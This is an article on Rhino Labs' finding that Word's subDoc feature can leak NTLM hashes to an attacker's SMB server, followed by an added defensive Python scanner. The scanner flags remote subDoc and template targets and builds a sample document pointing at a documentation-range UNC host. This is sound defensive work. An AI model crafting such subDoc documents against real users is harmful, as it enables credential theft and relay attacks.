Security researchers from Rhino Labs (a US-based cyber-security firm) have found that attackers can abuse a Microsoft Word feature known as subDoc to make a Windows machine hand over the user's NTLM authentication hash. This is not the password itself but the NTLM challenge-response that Windows sends automatically, using the logged-in account's credentials, whenever it authenticates to a network resource; once captured, it can be cracked offline to recover the password or relayed to other services.
The subDoc feature was designed to load one document into the body of another, so that content from the first appears inside the second while remaining a separate file that can be updated and viewed on its own.
Rhino's researchers pointed out that the subdocument does not have to be a local file: Word will also load a subDoc from an external, Internet-hosted location, and it is this behaviour that makes the feature exploitable under the right conditions.
To abuse this behaviour, the researchers said, an attacker assembles a Word file whose subDoc points at a server under their control. When the victim opens the file, Word attempts to fetch the subdocument over SMB. The attacker runs a malicious SMB server at the other end of that request and, instead of returning the requested subdocument, asks the client to authenticate to the attacker's fake domain. Windows answers that request on the user's behalf, and the NTLM hash it sends for authentication is captured by the attacker.
The researchers have released an open-source tool on GitHub called Subdoc Injector, which creates a Word subDoc for a user-supplied URL and embeds it into a user-specified 'parent' Word document.
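A defender-side counterpart to the technique above, added here as an example (it is not code from the article or from Rhino's Subdoc Injector): a .docx is a zip archive, and every reference a Word document makes to another part or file, including a subDoc, lives as a Relationship entry in a `.rels` file such as `word/_rels/document.xml.rels`. A document that will make Word reach out to an attacker's SMB server therefore carries a subDocument relationship whose Target is a UNC path (`\\host\share\...`) or a URL. The scanner below walks every `.rels` file in a document and reports relationships of the kinds Word resolves on its own at load time whose target leaves the machine. The sample document it builds is constructed in the example, with a TEST-NET address as the fake SMB host; it is not a real malicious file. The set of auto-resolved relationship kinds and the treatment of hyperlinks as click-only are the author's assumptions, not something the article states.

```python
"""Scan a .docx for relationships that make Word connect to a remote host on open.

Added example; not from the article or Rhino's tool. The constructed sample
document and the AUTO_RESOLVED set below are assumptions made for this example.
"""
from __future__ import annotations

import io
import re
import zipfile
import xml.etree.ElementTree as ET

REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
OFFICE_REL = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/"

# Relationship kinds that Word resolves by itself when the document loads
# (assumption for this example). A remote target on one of these causes an
# outbound connection without any user click. "hyperlink" is deliberately
# absent: it is only followed when the user clicks it.
AUTO_RESOLVED = {"subDocument", "attachedTemplate", "image", "oleObject"}

# A target that leaves the machine: a UNC path (\\host\share or //host/share)
# or anything with a URL scheme (http://, file://, ...).
REMOTE_TARGET = re.compile(r"^(\\\\|//|[a-z][a-z0-9+.\-]*://)", re.IGNORECASE)

# Constructed sample target; 203.0.113.0/24 is reserved for documentation.
SAMPLE_SUBDOC_TARGET = r"\\203.0.113.7\share\sub.docx"


def rel_kind(rel_type: str) -> str:
    """Reduce a full relationship type URI to its last path segment."""
    return rel_type.rsplit("/", 1)[-1]


def scan_docx(data: bytes) -> list[dict]:
    """Return every auto-resolved relationship whose Target points off the machine.

    Each finding records the .rels file it came from, the relationship Id,
    the relationship kind and the raw Target string.
    """
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for name in zf.namelist():
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(zf.read(name))
            for rel in root.iter(f"{{{REL_NS}}}Relationship"):
                kind = rel_kind(rel.get("Type", ""))
                target = rel.get("Target", "")
                if kind in AUTO_RESOLVED and REMOTE_TARGET.match(target):
                    findings.append({"rels_file": name, "id": rel.get("Id"),
                                     "kind": kind, "target": target})
    return findings


def build_sample_docx(subdoc_target: str) -> bytes:
    """Construct a minimal .docx whose single subDoc points at `subdoc_target`.

    This is sample data for the example: one paragraph of text, one subDoc
    anchor, and one ordinary hyperlink so the scanner's filtering is visible.
    """
    content_types = (
        '<?xml version="1.0" encoding="UTF-8"?>'
        '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">'
        '<Default Extension="rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>'
        '<Default Extension="xml" ContentType="application/xml"/>'
        '<Override PartName="/word/document.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.document.main+xml"/>'
        "</Types>"
    )
    root_rels = (
        f'<Relationships xmlns="{REL_NS}">'
        f'<Relationship Id="rId1" Type="{OFFICE_REL}officeDocument" Target="word/document.xml"/>'
        "</Relationships>"
    )
    document_xml = (
        '<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" '
        'xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships">'
        "<w:body><w:p><w:r><w:t>Quarterly report</w:t></w:r></w:p>"
        '<w:p><w:subDoc r:id="rId2"/></w:p>'
        '<w:p><w:hyperlink r:id="rId3"><w:r><w:t>link</w:t></w:r></w:hyperlink></w:p>'
        "</w:body></w:document>"
    )
    document_rels = (
        f'<Relationships xmlns="{REL_NS}">'
        f'<Relationship Id="rId2" Type="{OFFICE_REL}subDocument" Target="{subdoc_target}" TargetMode="External"/>'
        f'<Relationship Id="rId3" Type="{OFFICE_REL}hyperlink" Target="https://example.com/" TargetMode="External"/>'
        "</Relationships>"
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml", content_types)
        zf.writestr("_rels/.rels", root_rels)
        zf.writestr("word/document.xml", document_xml)
        zf.writestr("word/_rels/document.xml.rels", document_rels)
    return buf.getvalue()


if __name__ == "__main__":
    for finding in scan_docx(build_sample_docx(SAMPLE_SUBDOC_TARGET)):
        print(f"{finding['rels_file']}: {finding['kind']} {finding['id']} -> {finding['target']}")
```

To scan a real file, read it with `open(path, "rb").read()` and pass the bytes to `scan_docx`. The scanner reads only the `.rels` parts, so it also catches the same pattern in `word/_rels/settings.xml.rels` (remote attached templates) without any change; a relative target such as `sub.docx` produces no finding because it never leaves the machine.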